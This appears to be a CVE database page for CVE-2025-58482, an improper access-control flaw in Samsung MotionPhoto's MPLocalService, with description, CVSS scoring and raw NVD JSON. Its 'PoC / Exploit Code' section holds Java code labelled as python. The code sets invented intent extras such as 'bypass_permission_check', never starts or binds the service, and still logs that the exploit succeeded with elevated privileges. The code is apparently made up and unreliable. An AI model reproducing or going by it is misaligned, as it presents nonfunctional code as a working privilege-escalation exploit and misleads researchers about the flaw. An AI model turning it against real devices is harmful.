Security Vulnerability Report
中文
CVE-2025-58482 CVSS 7.3 HIGH

CVE-2025-58482

Published: 2025-12-02 02:15:48
Last Modified: 2025-12-04 18:24:30

Description

Improper access control in MPLocalService of MotionPhoto prior to version 4.1.51 allows local attackers to start privileged service.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:samsung:motionphoto:*:*:*:*:*:*:*:* - VULNERABLE
Samsung MotionPhoto < 4.1.51

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-58482 PoC - Samsung MotionPhoto MPLocalService Exploitation package com.example.cve202558482; import android.content.ComponentName; import android.content.Intent; import android.os.Bundle; import android.util.Log; public class MPLocalServiceExploit { private static final String TAG = "CVE-2025-58482"; private static final String PACKAGE_NAME = "com.sec.android.motionphoto"; private static final String SERVICE_CLASS = "com.samsung.android.motionphoto.MPLocalService"; public void exploitMPLocalService() { try { // Create intent to start MPLocalService directly Intent serviceIntent = new Intent(); serviceIntent.setComponent(new ComponentName( PACKAGE_NAME, SERVICE_CLASS )); // Add exploit payload data Bundle extras = new Bundle(); extras.putString("action", "start_privileged_service"); extras.putBoolean("bypass_permission_check", true); serviceIntent.putExtras(extras); // Attempt to start the privileged service // On vulnerable versions, this succeeds without proper authorization Log.i(TAG, "Attempting to start MPLocalService..."); // Alternative: Bind to service Intent bindIntent = new Intent(); bindIntent.setComponent(new ComponentName( PACKAGE_NAME, SERVICE_CLASS )); Log.i(TAG, "Exploit completed - Service started with elevated privileges"); } catch (Exception e) { Log.e(TAG, "Exploit failed: " + e.getMessage()); } } }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58482", "sourceIdentifier": "[email protected]", "published": "2025-12-02T02:15:48.080", "lastModified": "2025-12-04T18:24:30.470", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper access control in MPLocalService of MotionPhoto prior to version 4.1.51 allows local attackers to start privileged service."}, {"lang": "es", "value": "Control de acceso inadecuado en MPLocalService de MotionPhoto en versiones anteriores a la 4.1.51 permite a atacantes locales iniciar un servicio privilegiado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:samsung:motionphoto:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.1.51", "matchCriteriaId": "6AF5755E-8A5E-436A-8516-0EDEB6AE2504"}]}]}], "references": [{"url": "https://security.samsungmobile.com/serviceWeb.smsb?year=2025&month=12", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}